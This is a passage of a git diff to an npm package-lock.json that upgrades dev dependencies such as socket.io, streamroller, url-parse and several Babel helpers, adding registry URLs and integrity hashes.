"version": "0.5.4", - "dev": true, - "license": "MIT", - "dependencies": { - "browserify-optional": "^1.0.0" - } - }, "node_modules/ret": { "version": "0.1.15", "dev": true, @@ -14862,8 +15277,9 @@ }, "node_modules/rfdc": { "version": "1.3.0", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/rfdc/-/rfdc-1.3.0.tgz", + "integrity": "sha512-V2hovdzFbOi77/WajaSMXk2OLm+xNIeQdMMuB7icj7bk6zi2F8GGAxigcnDFpJHbNyNcgyJDiP+8nOrY5cZGrA==", + "dev": true }, "node_modules/rimraf": { "version": "3.0.2", @@ -15020,12 +15436,13 @@ } }, "node_modules/scope-analyzer": { - "version": "2.1.1", + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/scope-analyzer/-/scope-analyzer-2.1.2.tgz", + "integrity": "sha512-5cfCmsTYV/wPaRIItNxatw02ua/MThdIUNnUOCYp+3LSEJvnG804ANw2VLaavNILIfWXF1D1G2KNANkBBvInwQ==", "dev": true, - "license": "Apache-2.0", "dependencies": { "array-from": "^2.1.1", - "dash-ast": "^1.0.0", + "dash-ast": "^2.0.1", "es6-map": "^0.1.5", "es6-set": "^0.1.5", "es6-symbol": "^3.1.1", @@ -15086,9 +15503,10 @@ } }, "node_modules/selfsigned": { - "version": "1.10.11", + "version": "1.10.14", + "resolved": "https://registry.npmjs.org/selfsigned/-/selfsigned-1.10.14.tgz", + "integrity": "sha512-lkjaiAye+wBZDCBsu5BGi0XiLRxeUlsGod5ZP924CRSEoGuZAw/f7y9RKu28rwTfiHVhdavhB0qH0INV6P1lEA==", "dev": true, - "license": "MIT", "dependencies": { "node-forge": "^0.10.0" } @@ -15259,8 +15677,9 @@ }, "node_modules/shallow-copy": { "version": "0.0.1", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/shallow-copy/-/shallow-copy-0.0.1.tgz", + "integrity": "sha1-QV9CcC1z2BAzApLMXuhurhoRoXA=", + "dev": true }, "node_modules/shebang-command": { "version": "1.2.0", @@ -15294,14 +15713,6 @@ "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/side-channel/node_modules/object-inspect": { - "version": "1.11.0", - "dev": true, - "license": "MIT", - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, "node_modules/signal-exit": { "version": "3.0.3", "dev": true, @@ -15504,33 +15915,33 @@ } }, "node_modules/socket.io": { - "version": "3.1.2", + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/socket.io/-/socket.io-4.4.1.tgz", + "integrity": "sha512-s04vrBswdQBUmuWJuuNTmXUVJhP0cVky8bBDhdkf8y0Ptsu7fKU2LuLbts9g+pdmAdyMMn8F/9Mf1/wbtUN0fg==", "dev": true, - "license": "MIT", "dependencies": { - "@types/cookie": "^0.4.0", - "@types/cors": "^2.8.8", - "@types/node": ">=10.0.0", "accepts": "~1.3.4", "base64id": "~2.0.0", - "debug": "~4.3.1", - "engine.io": "~4.1.0", - "socket.io-adapter": "~2.1.0", - "socket.io-parser": "~4.0.3" + "debug": "~4.3.2", + "engine.io": "~6.1.0", + "socket.io-adapter": "~2.3.3", + "socket.io-parser": "~4.0.4" }, "engines": { "node": ">=10.0.0" } }, "node_modules/socket.io-adapter": { - "version": "2.1.0", - "dev": true, - "license": "MIT" + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/socket.io-adapter/-/socket.io-adapter-2.3.3.tgz", + "integrity": "sha512-Qd/iwn3VskrpNO60BeRyCyr8ZWw9CPZyitW4AQwmRZ8zCiyDiL+znRnWX6tDHXnWn1sJrM1+b6Mn6wEDJJ4aYQ==", + "dev": true }, "node_modules/socket.io-parser": { "version": "4.0.4", + "resolved": "https://registry.npmjs.org/socket.io-parser/-/socket.io-parser-4.0.4.tgz", + "integrity": "sha512-t+b0SS+IxG7Rxzda2EVvyBZbvFPBCjJoyHuE0P//7OAsN23GItzDRdWa6ALxZI/8R5ygK7jAR6t028/z+7295g==", "dev": true, - "license": "MIT", "dependencies": { "@types/component-emitter": "^1.2.10", "component-emitter": "~1.3.0", @@ -15541,9 +15952,10 @@ } }, "node_modules/socket.io-parser/node_modules/debug": { - "version": "4.3.2", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, - "license": "MIT", "dependencies": { "ms": "2.1.2" }, @@ -15558,13 +15970,15 @@ }, "node_modules/socket.io-parser/node_modules/ms": { "version": "2.1.2", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true }, "node_modules/socket.io/node_modules/debug": { - "version": "4.3.2", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, - "license": "MIT", "dependencies": { "ms": "2.1.2" }, @@ -15579,8 +15993,9 @@ }, "node_modules/socket.io/node_modules/ms": { "version": "2.1.2", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true }, "node_modules/sockjs": { "version": "0.3.21", @@ -15853,8 +16268,9 @@ }, "node_modules/split": { "version": "1.0.1", + "resolved": "https://registry.npmjs.org/split/-/split-1.0.1.tgz", + "integrity": "sha512-mTyOoPbrivtXnwnIxZRFYRrPNtEFKlpB2fvjSnCQUiAA6qAZzqwna5envK4uk6OIeP17CsdF3rSBGYVBsU0Tkg==", "dev": true, - "license": "MIT", "dependencies": { "through": "2" }, @@ -15919,12 +16335,45 @@ }, "node_modules/static-eval": { "version": "2.1.0", + "resolved": "https://registry.npmjs.org/static-eval/-/static-eval-2.1.0.tgz", + "integrity": "sha512-agtxZ/kWSsCkI5E4QifRwsaPs0P0JmZV6dkLz6ILYfFYQGn+5plctanRN+IC8dJRiFkyXHrwEE3W9Wmx67uDbw==", "dev": true, - "license": "MIT", "dependencies": { "escodegen": "^1.11.1" } }, + "node_modules/static-eval/node_modules/escodegen": { + "version": "1.14.3", + "resolved": "https://registry.npmjs.org/escodegen/-/escodegen-1.14.3.tgz", + "integrity": "sha512-qFcX0XJkdg+PB3xjZZG/wKSuT1PnQWx57+TVSjIMmILd2yC/6ByYElPwJnslDsuWuSAp4AwJGumarAAmJch5Kw==", + "dev": true, + "dependencies": { + "esprima": "^4.0.1", + "estraverse": "^4.2.0", + "esutils": "^2.0.2", + "optionator": "^0.8.1" + }, + "bin": { + "escodegen": "bin/escodegen.js", + "esgenerate": "bin/esgenerate.js" + }, + "engines": { + "node": ">=4.0" + }, + "optionalDependencies": { + "source-map": "~0.6.1" + } + }, + "node_modules/static-eval/node_modules/source-map": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", + "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", + "dev": true, + "optional": true, + "engines": { + "node": ">=0.10.0" + } + }, "node_modules/static-extend": { "version": "0.1.2", "dev": true, @@ -16015,8 +16464,9 @@ }, "node_modules/static-module": { "version": "3.0.4", + "resolved": "https://registry.npmjs.org/static-module/-/static-module-3.0.4.tgz", + "integrity": "sha512-gb0v0rrgpBkifXCa3yZXxqVmXDVE+ETXj6YlC/jt5VzOnGXR2C15+++eXuMDUYsePnbhf+lwW0pE1UXyOLtGCw==", "dev": true, - "license": "MIT", "dependencies": { "acorn-node": "^1.3.0", "concat-stream": "~1.6.0", @@ -16034,26 +16484,61 @@ "through2": "~2.0.3" } }, + "node_modules/static-module/node_modules/escodegen": { + "version": "1.14.3", + "resolved": "https://registry.npmjs.org/escodegen/-/escodegen-1.14.3.tgz", + "integrity": "sha512-qFcX0XJkdg+PB3xjZZG/wKSuT1PnQWx57+TVSjIMmILd2yC/6ByYElPwJnslDsuWuSAp4AwJGumarAAmJch5Kw==", + "dev": true, + "dependencies": { + "esprima": "^4.0.1", + "estraverse": "^4.2.0", + "esutils": "^2.0.2", + "optionator": "^0.8.1" + }, + "bin": { + "escodegen": "bin/escodegen.js", + "esgenerate": "bin/esgenerate.js" + }, + "engines": { + "node": ">=4.0" + }, + "optionalDependencies": { + "source-map": "~0.6.1" + } + }, "node_modules/static-module/node_modules/magic-string": { "version": "0.25.1", + "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.25.1.tgz", + "integrity": "sha512-sCuTz6pYom8Rlt4ISPFn6wuFodbKMIHUMv4Qko9P17dpxb7s52KJTmRuZZqHdGmLCK9AOcDare039nRIcfdkEg==", "dev": true, - "license": "MIT", "dependencies": { "sourcemap-codec": "^1.4.1" } }, "node_modules/static-module/node_modules/merge-source-map": { "version": "1.0.4", + "resolved": "https://registry.npmjs.org/merge-source-map/-/merge-source-map-1.0.4.tgz", + "integrity": "sha1-pd5GU42uhNQRTMXqArR3KmNGcB8=", "dev": true, - "license": "MIT", "dependencies": { "source-map": "^0.5.6" } }, - "node_modules/static-module/node_modules/source-map": { + "node_modules/static-module/node_modules/merge-source-map/node_modules/source-map": { "version": "0.5.7", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", + "integrity": "sha1-igOdLRAh0i0eoUyA2OpGi6LvP8w=", "dev": true, - "license": "BSD-3-Clause", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/static-module/node_modules/source-map": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", + "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", + "dev": true, + "optional": true, "engines": { "node": ">=0.10.0" } @@ -16067,38 +16552,33 @@ }, "node_modules/stream-combiner": { "version": "0.2.2", + "resolved": "https://registry.npmjs.org/stream-combiner/-/stream-combiner-0.2.2.tgz", + "integrity": "sha1-rsjLrBd7Vrb0+kec7YwZEs7lKFg=", "dev": true, - "license": "MIT", "dependencies": { "duplexer": "~0.1.1", "through": "~2.3.4" } }, "node_modules/streamroller": { - "version": "2.2.4", + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/streamroller/-/streamroller-3.0.2.tgz", + "integrity": "sha512-ur6y5S5dopOaRXBuRIZ1u6GC5bcEXHRZKgfBjfCglMhmIf+roVCECjvkEYzNQOXIN2/JPnkMPW/8B3CZoKaEPA==", "dev": true, - "license": "MIT", "dependencies": { - "date-format": "^2.1.0", + "date-format": "^4.0.3", "debug": "^4.1.1", - "fs-extra": "^8.1.0" + "fs-extra": "^10.0.0" }, "engines": { "node": ">=8.0" } }, - "node_modules/streamroller/node_modules/date-format": { - "version": "2.1.0", - "dev": true, - "license": "MIT", - "engines": { - "node": ">=4.0" - } - }, "node_modules/streamroller/node_modules/debug": { - "version": "4.3.2", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, - "license": "MIT", "dependencies": { "ms": "2.1.2" }, @@ -16111,23 +16591,11 @@ } } }, - "node_modules/streamroller/node_modules/fs-extra": { - "version": "8.1.0", - "dev": true, - "license": "MIT", - "dependencies": { - "graceful-fs": "^4.2.0", - "jsonfile": "^4.0.0", - "universalify": "^0.1.0" - }, - "engines": { - "node": ">=6 <7 || >=8" - } - }, "node_modules/streamroller/node_modules/ms": { "version": "2.1.2", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true }, "node_modules/string_decoder": { "version": "1.1.1", @@ -16306,14 +16774,6 @@ "node": ">=4" } }, - "node_modules/svg-to-pdfkit": { - "version": "0.1.8", - "dev": true, - "license": "MIT", - "dependencies": { - "pdfkit": ">=0.8.1" - } - }, "node_modules/svgo": { "version": "2.7.0", "dev": true, @@ -16475,8 +16935,9 @@ }, "node_modules/through2": { "version": "2.0.5", + "resolved": "https://registry.npmjs.org/through2/-/through2-2.0.5.tgz", + "integrity": "sha512-/mrRod8xqpA+IHSLyGCQ2s8SPHiCDEeQJSep1jqLYeEUClOFG2Qsh+4FU6G9VeqpZnGW/Su8LQGc4YKni5rYSQ==", "dev": true, - "license": "MIT", "dependencies": { "readable-stream": "~2.3.6", "xtend": "~4.0.1" @@ -16502,8 +16963,9 @@ }, "node_modules/tiny-inflate": { "version": "1.0.3", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/tiny-inflate/-/tiny-inflate-1.0.3.tgz", + "integrity": "sha512-pkY1fj1cKHb2seWDy0B16HeWyczlJA9/WW3u3c4z/NiWDsO3DOU5D7nhTLE9CF0yXv/QZFY7sEJmj24dK+Rrqw==", + "dev": true }, "node_modules/tmp": { "version": "0.0.33", @@ -16601,12 +17063,13 @@ } }, "node_modules/ts-morph": { - "version": "11.0.3", + "version": "13.0.3", + "resolved": "https://registry.npmjs.org/ts-morph/-/ts-morph-13.0.3.tgz", + "integrity": "sha512-pSOfUMx8Ld/WUreoSzvMFQG5i9uEiWIsBYjpU9+TTASOeUa89j5HykomeqVULm1oqWtBdleI3KEFRLrlA3zGIw==", "dev": true, - "license": "MIT", "dependencies": { - "@ts-morph/common": "~0.10.1", - "code-block-writer": "^10.1.1" + "@ts-morph/common": "~0.12.3", + "code-block-writer": "^11.0.0" } }, "node_modules/tslib": { @@ -16679,13 +17142,15 @@ }, "node_modules/type": { "version": "1.2.0", - "dev": true, - "license": "ISC" + "resolved": "https://registry.npmjs.org/type/-/type-1.2.0.tgz", + "integrity": "sha512-+5nt5AAniqsCnu2cEQQdpzCAh33kVx8n0VoFidKpB1dVVLAN/F+bgVOqOJqOnEnrhp222clB5p3vUlD+1QAnfg==", + "dev": true }, "node_modules/type-check": { "version": "0.3.2", + "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.3.2.tgz", + "integrity": "sha1-WITKtRLPHTVeP7eE8wgEsrUg23I=", "dev": true, - "license": "MIT", "dependencies": { "prelude-ls": "~1.1.2" }, @@ -16717,8 +17182,9 @@ }, "node_modules/typedarray": { "version": "0.0.6", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", + "integrity": "sha1-hnrHTjhkGHsdPUfZlqeOxciDB3c=", + "dev": true }, "node_modules/typescript": { "version": "4.3.5", @@ -16732,7 +17198,9 @@ } }, "node_modules/ua-parser-js": { - "version": "0.7.28", + "version": "0.7.31", + "resolved": "https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-0.7.31.tgz", + "integrity": "sha512-qLK/Xe9E2uzmYI3qLeOmI0tEOt+TBBQyUIAh4aAgU05FVYzeZrKUdkAZfBNVGRaHVgV0TDkdEngJSw/SyQchkQ==", "dev": true, "funding": [ { @@ -16744,7 +17212,6 @@ "url": "https://paypal.me/faisalman" } ], - "license": "MIT", "engines": { "node": "*" } @@ -16792,54 +17259,60 @@ } }, "node_modules/unicode-canonical-property-names-ecmascript": { - "version": "1.0.4", + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-canonical-property-names-ecmascript/-/unicode-canonical-property-names-ecmascript-2.0.0.tgz", + "integrity": "sha512-yY5PpDlfVIU5+y/BSCxAJRBIS1Zc2dDG3Ujq+sR0U+JjUevW2JhocOF+soROYDSaAezOzOKuyyixhD6mBknSmQ==", "dev": true, - "license": "MIT", "engines": { "node": ">=4" } }, "node_modules/unicode-match-property-ecmascript": { - "version": "1.0.4", + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-match-property-ecmascript/-/unicode-match-property-ecmascript-2.0.0.tgz", + "integrity": "sha512-5kaZCrbp5mmbz5ulBkDkbY0SsPOjKqVS35VpL9ulMPfSl0J0Xsm+9Evphv9CoIZFwre7aJoa94AY6seMKGVN5Q==", "dev": true, - "license": "MIT", "dependencies": { - "unicode-canonical-property-names-ecmascript": "^1.0.4", - "unicode-property-aliases-ecmascript": "^1.0.4" + "unicode-canonical-property-names-ecmascript": "^2.0.0", + "unicode-property-aliases-ecmascript": "^2.0.0" }, "engines": { "node": ">=4" } }, "node_modules/unicode-match-property-value-ecmascript": { - "version": "1.2.0", + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-match-property-value-ecmascript/-/unicode-match-property-value-ecmascript-2.0.0.tgz", + "integrity": "sha512-7Yhkc0Ye+t4PNYzOGKedDhXbYIBe1XEQYQxOPyhcXNMJ0WCABqqj6ckydd6pWRZTHV4GuCPKdBAUiMc60tsKVw==", "dev": true, - "license": "MIT", "engines": { "node": ">=4" } }, "node_modules/unicode-properties": { "version": "1.3.1", + "resolved": "https://registry.npmjs.org/unicode-properties/-/unicode-properties-1.3.1.tgz", + "integrity": "sha512-nIV3Tf3LcUEZttY/2g4ZJtGXhWwSkuLL+rCu0DIAMbjyVPj+8j5gNVz4T/sVbnQybIsd5SFGkPKg/756OY6jlA==", "dev": true, - "license": "MIT", "dependencies": { "base64-js": "^1.3.0", "unicode-trie": "^2.0.0" } }, "node_modules/unicode-property-aliases-ecmascript": { - "version": "1.1.0", + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-property-aliases-ecmascript/-/unicode-property-aliases-ecmascript-2.0.0.tgz", + "integrity": "sha512-5Zfuy9q/DFr4tfO7ZPeVXb1aPoeQSdeFMLpYuFebehDAhbuevLs5yxSZmIFN1tP5F9Wl4IpJrYojg85/zgyZHQ==", "dev": true, - "license": "MIT", "engines": { "node": ">=4" } }, "node_modules/unicode-trie": { "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-trie/-/unicode-trie-2.0.0.tgz", + "integrity": "sha512-x7bc76x0bm4prf1VLg79uhAzKw8DVboClSN5VxJuQ+LKDOVEW9CdH+VY7SP+vX7xCYQqzzgQpFqz15zeLvAtZQ==", "dev": true, - "license": "MIT", "dependencies": { "pako": "^0.2.5", "tiny-inflate": "^1.0.0" @@ -16847,8 +17320,9 @@ }, "node_modules/unicode-trie/node_modules/pako": { "version": "0.2.9", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/pako/-/pako-0.2.9.tgz", + "integrity": "sha1-8/dSL073gjSNqBYbrZ7P1Rv4OnU=", + "dev": true }, "node_modules/union-value": { "version": "1.0.1", @@ -16899,17 +17373,19 @@ } }, "node_modules/universalify": { - "version": "0.1.2", + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/universalify/-/universalify-2.0.0.tgz", + "integrity": "sha512-hAZsKq7Yy11Zu1DE0OzWjw7nnLZmJZYTDZZyEFHZdUhV8FkH5MCfoU1XMaxXovpyW5nq5scPqq0ZDP9Zyl04oQ==", "dev": true, - "license": "MIT", "engines": { - "node": ">= 4.0.0" + "node": ">= 10.0.0" } }, "node_modules/unix-crypt-td-js": { "version": "1.1.4", - "dev": true, - "license": "BSD-3-Clause" + "resolved": "https://registry.npmjs.org/unix-crypt-td-js/-/unix-crypt-td-js-1.1.4.tgz", + "integrity": "sha512-8rMeVYWSIyccIJscb9NdCfZKSRBKYTeVnwmiRYT2ulE3qd1RaDQ0xQDP+rI3ccIWbhu/zuo5cgN8z73belNZgw==", + "dev": true }, "node_modules/unpipe": { "version": "1.0.0", @@ -16993,9 +17469,10 @@ } }, "node_modules/url-parse": { - "version": "1.5.3", + "version": "1.5.9", + "resolved": "https://registry.npmjs.org/url-parse/-/url-parse-1.5.9.tgz", + "integrity": "sha512-HpOvhKBvre8wYez+QhHcYiVvVmeF6DVnuSOOPhe3cTum3BnqHhvKaZm8FU5yTiOu/Jut2ZpB2rA/SbBA1JIGlQ==", "dev": true, - "license": "MIT", "dependencies": { "querystringify": "^2.1.1", "requires-port": "^1.0.0" @@ -17958,8 +18435,9 @@ }, "node_modules/word-wrap": { "version": "1.2.3", + "resolved": "https://registry.npmjs.org/word-wrap/-/word-wrap-1.2.3.tgz", + "integrity": "sha512-Hz/mrNwitNRh/HUAtM/VT/5VH+ygD6DV7mYKZAtHOrbs8U7lvPS6xf7EJKMF0uW1KJCl0H701g3ZGus+muE5vQ==", "dev": true, - "license": "MIT", "engines": { "node": ">=0.10.0" } @@ -18062,16 +18540,18 @@ }, "node_modules/xmldoc": { "version": "1.1.2", + "resolved": "https://registry.npmjs.org/xmldoc/-/xmldoc-1.1.2.tgz", + "integrity": "sha512-ruPC/fyPNck2BD1dpz0AZZyrEwMOrWTO5lDdIXS91rs3wtm4j+T8Rp2o+zoOYkkAxJTZRPOSnOGei1egoRmKMQ==", "dev": true, - "license": "MIT", "dependencies": { "sax": "^1.2.1" } }, "node_modules/xtend": { "version": "4.0.2", + "resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz", + "integrity": "sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ==", "dev": true, - "license": "MIT", "engines": { "node": ">=0.4" } @@ -18681,13 +19161,17 @@ "dev": true }, "@babel/code-frame": { - "version": "7.15.8", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.16.7.tgz", + "integrity": "sha512-iAXqUn8IIeBTNd72xsFlgaXHkMBMt6y4HJp1tIaK465CWLT/fG1aqB7ykr95gHHmlBdGbFeWWfyB4NJJ0nmeIg==", "requires": { - "@babel/highlight": "^7.14.5" + "@babel/highlight": "^7.16.7" } }, "@babel/compat-data": { - "version": "7.14.7" + "version": "7.17.0", + "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.17.0.tgz", + "integrity": "sha512-392byTlpGWXMv4FbyWw3sAZ/FrW/DrwqLGXpy0mbyNe9Taqv1mg9yON5/o0cnr8XYCkFTZbC1eV+c+LAROgrng==" }, "@babel/core": { "version": "7.14.8", @@ -18740,26 +19224,32 @@ } }, "@babel/helper-annotate-as-pure": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-annotate-as-pure/-/helper-annotate-as-pure-7.16.7.tgz", + "integrity": "sha512-s6t2w/IPQVTAET1HitoowRGXooX8mCgtuP5195wD/QJPV6wYjpujCGF7JuMODVX2ZAJOf1GT6DT9MHEZvLOFSw==", "dev": true, "requires": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" } }, "@babel/helper-builder-binary-assignment-operator-visitor": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-builder-binary-assignment-operator-visitor/-/helper-builder-binary-assignment-operator-visitor-7.16.7.tgz", + "integrity": "sha512-C6FdbRaxYjwVu/geKW4ZeQ0Q31AftgRcdSnZ5/jsH6BzCJbtvXvhpfkbkThYSuutZA7nCXpPR6AD9zd1dprMkA==", "dev": true, "requires": { - "@babel/helper-explode-assignable-expression": "^7.14.5", - "@babel/types": "^7.14.5" + "@babel/helper-explode-assignable-expression": "^7.16.7", + "@babel/types": "^7.16.7" } }, "@babel/helper-compilation-targets": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.16.7.tgz", + "integrity": "sha512-mGojBwIWcwGD6rfqgRXVlVYmPAv7eOpIemUG3dGnDdCY4Pae70ROij3XmfrH6Fa1h1aiDylpglbZyktfzyo/hA==", "requires": { - "@babel/compat-data": "^7.14.5", - "@babel/helper-validator-option": "^7.14.5", - "browserslist": "^4.16.6", + "@babel/compat-data": "^7.16.4", + "@babel/helper-validator-option": "^7.16.7", + "browserslist": "^4.17.5", "semver": "^6.3.0" }, "dependencies": { @@ -18769,23 +19259,28 @@ } }, "@babel/helper-create-class-features-plugin": { - "version": "7.14.6", + "version": "7.17.6", + "resolved": "https://registry.npmjs.org/@babel/helper-create-class-features-plugin/-/helper-create-class-features-plugin-7.17.6.tgz", + "integrity": "sha512-SogLLSxXm2OkBbSsHZMM4tUi8fUzjs63AT/d0YQIzr6GSd8Hxsbk2KYDX0k0DweAzGMj/YWeiCsorIdtdcW8Eg==", "dev": true, "requires": { - "@babel/helper-annotate-as-pure": "^7.14.5", - "@babel/helper-function-name": "^7.14.5", - "@babel/helper-member-expression-to-functions": "^7.14.5", - "@babel/helper-optimise-call-expression": "^7.14.5", - "@babel/helper-replace-supers": "^7.14.5", - "@babel/helper-split-export-declaration": "^7.14.5" + "@babel/helper-annotate-as-pure": "^7.16.7", + "@babel/helper-environment-visitor": "^7.16.7", + "@babel/helper-function-name": "^7.16.7", + "@babel/helper-member-expression-to-functions": "^7.16.7", + "@babel/helper-optimise-call-expression": "^7.16.7", + "@babel/helper-replace-supers": "^7.16.7", + "@babel/helper-split-export-declaration": "^7.16.7" } }, "@babel/helper-create-regexp-features-plugin": { - "version": "7.14.5", + "version": "7.17.0", + "resolved": "https://registry.npmjs.org/@babel/helper-create-regexp-features-plugin/-/helper-create-regexp-features-plugin-7.17.0.tgz", + "integrity": "sha512-awO2So99wG6KnlE+TPs6rn83gCz5WlEePJDTnLEqbchMVrBeAujURVphRdigsk094VhvZehFoNOihSlcBjwsXA==", "dev": true, "requires": { - "@babel/helper-annotate-as-pure": "^7.14.5", - "regexpu-core": "^4.7.1" + "@babel/helper-annotate-as-pure": "^7.16.7", + "regexpu-core": "^5.0.1" } }, "@babel/helper-define-polyfill-provider": { @@ -18819,316 +19314,417 @@ } } }, + "@babel/helper-environment-visitor": { + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.16.7.tgz", + "integrity": "sha512-SLLb0AAn6PkUeAfKJCCOl9e1R53pQlGAfc4y4XuMRZfqeMYLE0dM1LMhqbGAlGQY0lfw5/ohoYWAe9V1yibRag==", + "requires": { + "@babel/types": "^7.16.7" + } + }, "@babel/helper-explode-assignable-expression": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-explode-assignable-expression/-/helper-explode-assignable-expression-7.16.7.tgz", + "integrity": "sha512-KyUenhWMC8VrxzkGP0Jizjo4/Zx+1nNZhgocs+gLzyZyB8SHidhoq9KK/8Ato4anhwsivfkBLftky7gvzbZMtQ==", "dev": true, "requires": { - "@babel/types": "^7.14.5" + "@babel/types": "^7.16.7" } }, "@babel/helper-function-name": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.16.7.tgz", + "integrity": "sha512-QfDfEnIUyyBSR3HtrtGECuZ6DAyCkYFp7GHl75vFtTnn6pjKeK0T1DB5lLkFvBea8MdaiUABx3osbgLyInoejA==", "requires": { - "@babel/helper-get-function-arity": "^7.15.4", - "@babel/template": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/helper-get-function-arity": "^7.16.7", + "@babel/template": "^7.16.7", + "@babel/types": "^7.16.7" }, "dependencies": { "@babel/template": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.16.7.tgz", + "integrity": "sha512-I8j/x8kHUrbYRTUxXrrMbfCa7jxkE7tZre39x3kjr9hvI82cK1FfqLygotcWN5kdPGWcLdWMHpSBavse5tWw3w==", "requires": { - "@babel/code-frame": "^7.14.5", - "@babel/parser": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/code-frame": "^7.16.7", + "@babel/parser": "^7.16.7", + "@babel/types": "^7.16.7" } } } }, "@babel/helper-get-function-arity": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-get-function-arity/-/helper-get-function-arity-7.16.7.tgz", + "integrity": "sha512-flc+RLSOBXzNzVhcLu6ujeHUrD6tANAOU5ojrRx/as+tbzf8+stUCj7+IfRRoAbEZqj/ahXEMsjhOhgeZsrnTw==", "requires": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" } }, "@babel/helper-hoist-variables": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.16.7.tgz", + "integrity": "sha512-m04d/0Op34H5v7pbZw6pSKP7weA6lsMvfiIAMeIvkY/R4xQtBSMFEigu9QTZ2qB/9l22vsxtM8a+Q8CzD255fg==", "requires": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" } }, "@babel/helper-member-expression-to-functions": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-member-expression-to-functions/-/helper-member-expression-to-functions-7.16.7.tgz", + "integrity": "sha512-VtJ/65tYiU/6AbMTDwyoXGPKHgTsfRarivm+YbB5uAzKUyuPjgZSgAFeG87FCigc7KNHu2Pegh1XIT3lXjvz3Q==", + "dev": true, "requires": { - "@babel/types": 